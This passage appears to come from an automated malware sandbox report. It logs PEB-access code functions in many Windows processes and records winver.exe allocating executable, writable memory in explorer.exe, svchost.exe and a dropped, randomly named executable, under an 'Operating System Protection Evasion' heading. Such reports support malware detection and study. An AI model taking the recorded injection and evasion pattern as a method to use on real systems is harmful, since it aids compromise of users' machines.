    Source: C:\Windows\explorer.exeCode function: 4_2_02DF0C80 mov eax, dword ptr fs:[00000030h]4_2_02DF0C80
    Source: C:\Windows\explorer.exeCode function: 4_2_02DF404D mov edi, dword ptr fs:[00000030h]4_2_02DF404D
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D00C80 mov eax, dword ptr fs:[00000030h]5_2_00D00C80
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D0404D mov edi, dword ptr fs:[00000030h]5_2_00D0404D
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F00C80 mov eax, dword ptr fs:[00000030h]6_2_00F00C80
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F0404D mov edi, dword ptr fs:[00000030h]6_2_00F0404D
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_0019404D mov edi, dword ptr fs:[00000030h]7_2_0019404D
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_00190C80 mov eax, dword ptr fs:[00000030h]7_2_00190C80
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E0C80 mov eax, dword ptr fs:[00000030h]8_2_009E0C80
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E404D mov edi, dword ptr fs:[00000030h]8_2_009E404D
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_00840C80 mov eax, dword ptr fs:[00000030h]9_2_00840C80
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_0084404D mov edi, dword ptr fs:[00000030h]9_2_0084404D
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE0C80 mov eax, dword ptr fs:[00000030h]10_2_00EE0C80
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE404D mov edi, dword ptr fs:[00000030h]10_2_00EE404D
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A40C80 mov eax, dword ptr fs:[00000030h]11_2_00A40C80
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A4404D mov edi, dword ptr fs:[00000030h]11_2_00A4404D
    Source: C:\Windows\System32\dllhost.exeCode function: 15_2_005F404D mov edi, dword ptr fs:[00000030h]15_2_005F404D
    Source: C:\Windows\System32\dllhost.exeCode function: 15_2_005F0C80 mov eax, dword ptr fs:[00000030h]15_2_005F0C80
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_0053404D mov edi, dword ptr fs:[00000030h]16_2_0053404D
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_00530C80 mov eax, dword ptr fs:[00000030h]16_2_00530C80
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00820C80 mov eax, dword ptr fs:[00000030h]17_2_00820C80
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0082404D mov edi, dword ptr fs:[00000030h]17_2_0082404D
    Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_0025404D mov edi, dword ptr fs:[00000030h]18_2_0025404D
    Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_00250C80 mov eax, dword ptr fs:[00000030h]18_2_00250C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C404D mov edi, dword ptr fs:[00000030h]19_2_001C404D
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C0C80 mov eax, dword ptr fs:[00000030h]19_2_001C0C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_022502AE mov eax, dword ptr fs:[00000030h]19_2_022502AE
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_02250D34 mov eax, dword ptr fs:[00000030h]19_2_02250D34
    Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 20_2_00930C80 mov eax, dword ptr fs:[00000030h]20_2_00930C80
    Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 20_2_0093404D mov edi, dword ptr fs:[00000030h]20_2_0093404D
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_0018404D mov edi, dword ptr fs:[00000030h]22_2_0018404D
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_00180C80 mov eax, dword ptr fs:[00000030h]22_2_00180C80
    Source: C:\Windows\System32\svchost.exeCode function: 23_2_0067404D mov edi, dword ptr fs:[00000030h]23_2_0067404D
    Source: C:\Windows\System32\svchost.exeCode function: 23_2_00670C80 mov eax, dword ptr fs:[00000030h]23_2_00670C80
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 24_2_009C0C80 mov eax, dword ptr fs:[00000030h]24_2_009C0C80
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 24_2_009C404D mov edi, dword ptr fs:[00000030h]24_2_009C404D
    Source: C:\Windows\System32\conhost.exeCode function: 25_2_00F70C80 mov eax, dword ptr fs:[00000030h]25_2_00F70C80
    Source: C:\Windows\System32\conhost.exeCode function: 25_2_00F7404D mov edi, dword ptr fs:[00000030h]25_2_00F7404D
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 27_2_00D50C80 mov eax, dword ptr fs:[00000030h]27_2_00D50C80
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 27_2_00D5404D mov edi, dword ptr fs:[00000030h]27_2_00D5404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 29_2_011A404D mov edi, dword ptr fs:[00000030h]29_2_011A404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 29_2_011A0C80 mov eax, dword ptr fs:[00000030h]29_2_011A0C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C404D mov edi, dword ptr fs:[00000030h]30_2_001C404D
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C0C80 mov eax, dword ptr fs:[00000030h]30_2_001C0C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_0214404D mov edi, dword ptr fs:[00000030h]30_2_0214404D
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02140C80 mov eax, dword ptr fs:[00000030h]30_2_02140C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_021502AE mov eax, dword ptr fs:[00000030h]30_2_021502AE
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02150D34 mov eax, dword ptr fs:[00000030h]30_2_02150D34
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 31_2_0234404D mov edi, dword ptr fs:[00000030h]31_2_0234404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 31_2_02340C80 mov eax, dword ptr fs:[00000030h]31_2_02340C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 32_2_00D60C80 mov eax, dword ptr fs:[00000030h]32_2_00D60C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 32_2_00D6404D mov edi, dword ptr fs:[00000030h]32_2_00D6404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 33_2_00E10C80 mov eax, dword ptr fs:[00000030h]33_2_00E10C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 33_2_00E1404D mov edi, dword ptr fs:[00000030h]33_2_00E1404D
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_001D404D mov edi, dword ptr fs:[00000030h]34_2_001D404D
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_001D0C80 mov eax, dword ptr fs:[00000030h]34_2_001D0C80
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_008B0CA4 mov eax, dword ptr fs:[00000030h]34_2_008B0CA4
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_008B4071 mov edi, dword ptr fs:[00000030h]34_2_008B4071
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 35_2_0214404D mov edi, dword ptr fs:[00000030h]35_2_0214404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 35_2_02140C80 mov eax, dword ptr fs:[00000030h]35_2_02140C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 36_2_0073404D mov edi, dword ptr fs:[00000030h]36_2_0073404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 36_2_00730C80 mov eax, dword ptr fs:[00000030h]36_2_00730C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 37_2_00B10C80 mov eax, dword ptr fs:[00000030h]37_2_00B10C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 37_2_00B1404D mov edi, dword ptr fs:[00000030h]37_2_00B1404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 38_2_0268404D mov edi, dword ptr fs:[00000030h]38_2_0268404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 38_2_02680C80 mov eax, dword ptr fs:[00000030h]38_2_02680C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 39_2_0255404D mov edi, dword ptr fs:[00000030h]39_2_0255404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 39_2_02550C80 mov eax, dword ptr fs:[00000030h]39_2_02550C80
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 40_2_0213404D mov edi, dword ptr fs:[00000030h]40_2_0213404D
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 40_2_02130C80 mov eax, dword ptr fs:[00000030h]40_2_02130C80

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: F80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\sihost.exe base: D00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: F00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 9E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 840000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: EE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: BB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 530000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 820000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 250000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 980000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 180000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 670000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 9C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\conhost.exe base: F70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: 710000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: D50000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11A0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2340000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2140000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 730000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2680000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2550000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2130000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B20000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2ED0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2120000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 28D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 25B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2920000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2480000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2180000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 14D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 26B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1380000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2840000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2F10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2210000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: C10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: F90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 620000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 860000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7A0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1270000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: BD0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 5F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 920000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 980000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2000000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: A20000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10F0000 protect: page execute and read and writeJump to behavior
